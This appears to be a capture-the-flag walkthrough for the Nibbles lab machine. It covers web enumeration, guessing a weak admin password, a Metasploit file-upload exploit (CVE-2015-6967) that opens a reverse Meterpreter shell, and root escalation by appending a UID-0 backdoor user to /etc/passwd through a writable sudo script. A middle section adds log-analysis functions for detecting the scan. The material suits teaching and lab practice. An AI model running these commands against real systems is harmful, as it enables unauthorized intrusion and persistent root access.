Hints

  • Ensure that you are enumerating the web application properly. Always remember to do the simple stuff like checking for robots.txt and sitemap.xml and looking at the page source.
  • If you get a 200 HTTP response code on something with an interesting name, definitely look at the content; it might reveal important information.
  • Think about common password mistakes that are often made by users; they’re not often creative or secure when they’re lazy or in a rush.
  • Always check user permissions, whether it’s file permissions or sudo permissions.

Enumeration

As usual, start with an nmap scan to get a listing of open ports and services:

PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp    open     http          Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS

There are only 2 ports open: 80 for the web server hosted by Apache and 22 for SSH.

Going to the web server at route / reveals a simple static page with only some testing text. Viewing the page source, though, reveals a code comment referencing the route /nibbleblog.

Going to the /nibbleblog route shows a blog site powered by ‘Nibbleblog CMS’. Start directory busting in the background while exploring the site. feroxbuster is my current favourite:

feroxbuster -u http://nibbles.htb/nibbleblog/ -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt

There is not a lot of content in the blog site, but there is a login page for the admin portal at /nibbleblog/admin.php. Additionally, directory busting turns up several .xml files. Directory listing is enabled on most endpoints, allowing easy navigation and listing of files on the web server. One of the .xml files is /nibbleblog/content/private/users.xml, which contains the name of the admin user: simply admin.
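The activity above (a wordlist walk producing bursts of 404s, followed by a 200 on a file under content/private/) is exactly what the server's access log records. As an added example that is not part of the original writeup, the following POSIX shell functions run over a constructed Apache combined-log excerpt (the addresses, timestamps and User-Agent strings are made up for illustration) and flag both the scanning source and any private file that was actually served:

```shell
#!/bin/sh
# Added example, not from the original writeup. Constructed Apache combined-log
# excerpt: 10.0.0.5 walks /nibbleblog/ with a wordlist (burst of 404s, scanner
# User-Agent) and then fetches users.xml; 10.0.0.9 is an ordinary visitor.
SAMPLE_LOG_FILE=$(mktemp)
cat > "$SAMPLE_LOG_FILE" <<'EOF'
10.0.0.5 - - [19/Aug/2024:19:10:01 +1000] "GET /nibbleblog/backup HTTP/1.1" 404 275 "-" "feroxbuster/2.10.0"
10.0.0.5 - - [19/Aug/2024:19:10:01 +1000] "GET /nibbleblog/test HTTP/1.1" 404 275 "-" "feroxbuster/2.10.0"
10.0.0.5 - - [19/Aug/2024:19:10:01 +1000] "GET /nibbleblog/old HTTP/1.1" 404 275 "-" "feroxbuster/2.10.0"
10.0.0.5 - - [19/Aug/2024:19:10:02 +1000] "GET /nibbleblog/dev HTTP/1.1" 404 275 "-" "feroxbuster/2.10.0"
10.0.0.5 - - [19/Aug/2024:19:10:02 +1000] "GET /nibbleblog/tmp HTTP/1.1" 404 275 "-" "feroxbuster/2.10.0"
10.0.0.5 - - [19/Aug/2024:19:10:02 +1000] "GET /nibbleblog/content/ HTTP/1.1" 200 1532 "-" "feroxbuster/2.10.0"
10.0.0.5 - - [19/Aug/2024:19:10:03 +1000] "GET /nibbleblog/content/private/users.xml HTTP/1.1" 200 412 "-" "feroxbuster/2.10.0"
10.0.0.9 - - [19/Aug/2024:19:11:40 +1000] "GET /nibbleblog/ HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
10.0.0.9 - - [19/Aug/2024:19:11:41 +1000] "GET /nibbleblog/missing.png HTTP/1.1" 404 275 "-" "Mozilla/5.0"
EOF

# Print each source address that produced at least $2 responses with status 404
# in log file $1. In the combined format field 1 is the client address and
# field 9 the status code.
flag_dirbust_sources() {
    awk -v t="$2" '$9 == 404 { c[$1]++ }
        END { for (ip in c) if (c[ip] >= t) print ip }' "$1" | sort
}

# Print "client path" for every request under content/private/ that the server
# actually answered with 200. With directory listing enabled, anything in this
# directory (users.xml included) is reachable without authentication.
exposed_private_files() {
    awk '$9 == 200 && $7 ~ /\/content\/private\// { print $1, $7 }' "$1"
}

# Usage on a real log: flag_dirbust_sources /var/log/apache2/access.log 50
flag_dirbust_sources "$SAMPLE_LOG_FILE" 5
exposed_private_files "$SAMPLE_LOG_FILE"
```

The 404 threshold is deliberately a parameter: an ordinary visitor with a broken image link (10.0.0.9 above) must not trip it, while a wordlist run of a few thousand requests will clear any sensible value. The second function is the check worth running after the fact: a 200 on content/private/ is the exposure itself, regardless of who triggered it.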

No password is available, so it can be presumed that the site has a weak password set. Using /usr/share/wordlists/fasttrack.txt on Kali doesn’t work, although it’s a reasonable first attempt that covers some common bad passwords. However, the password is even simpler and can be guessed: it is the name of the box, nibbles. Finding this is just a matter of critical thinking.

Exploitation

With authenticated access to Nibbleblog, it is possible to administer the site. There is a well-known vulnerability in Nibbleblog version 4.0.3, CVE-2015-6967, which can be found with searchsploit:

searchsploit nibbleblog

It lists a Metasploit module, which is fairly easy to use:

use multi/http/nibbleblog_file_upload
set LHOST tun0
set LPORT 4444
set TARGETURI /nibbleblog
set USERNAME admin
set PASSWORD nibbles
run

This successfully gets a shell as the nibbler user on the Nibbles host:

[*] Started reverse TCP handler on 10.10.14.23:4444
[*] Sending stage (39927 bytes) to 10.129.131.58
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.129.131.58:40002) at 2024-08-19 19:19:18 +1000

meterpreter > sysinfo
Computer    : Nibbles
OS          : Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: nibbler

Privilege Escalation

One of the first and simplest things to do manually after landing on a new Linux host is to check sudo privileges by running:

sudo -l

This will reveal what can be done on the machine using elevated privileges for the current user:

Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Being able to run a specific script as root may be a powerful privilege, depending on what monitor.sh does. The script itself, found after unzipping personal.zip in the nibbler user’s home directory, is not very interesting. However, the permissions on the script file are: it is writable by the nibbler user.

Being able both to edit the script and to run it as root means the nibbler user can execute anything with elevated permissions. Exploitation is trivial at this point:

echo "echo 'pentester:\$6\$XUv5UQT4xk7dlH79\$L0QXFTE.c3FZDesSlFVszVJwZdUpPOtZbjMLQaB7e20Oco3cy1hOmJecg3PMv0i2UGxMooEQcrw/jJ72ccZpj/:0:0:root:/root:/bin/bash' >> /etc/passwd" >> /home/nibbler/personal/stuff/monitor.sh

And then:

sudo /home/nibbler/personal/stuff/monitor.sh

A pentester user with password Pentester123! has now been appended to /etc/passwd. Because its UID and GID are 0, this user is effectively root, and it can be switched to with:

su pentester

With the pentester user holding effective root permissions, the box is fully compromised and persistence has been achieved.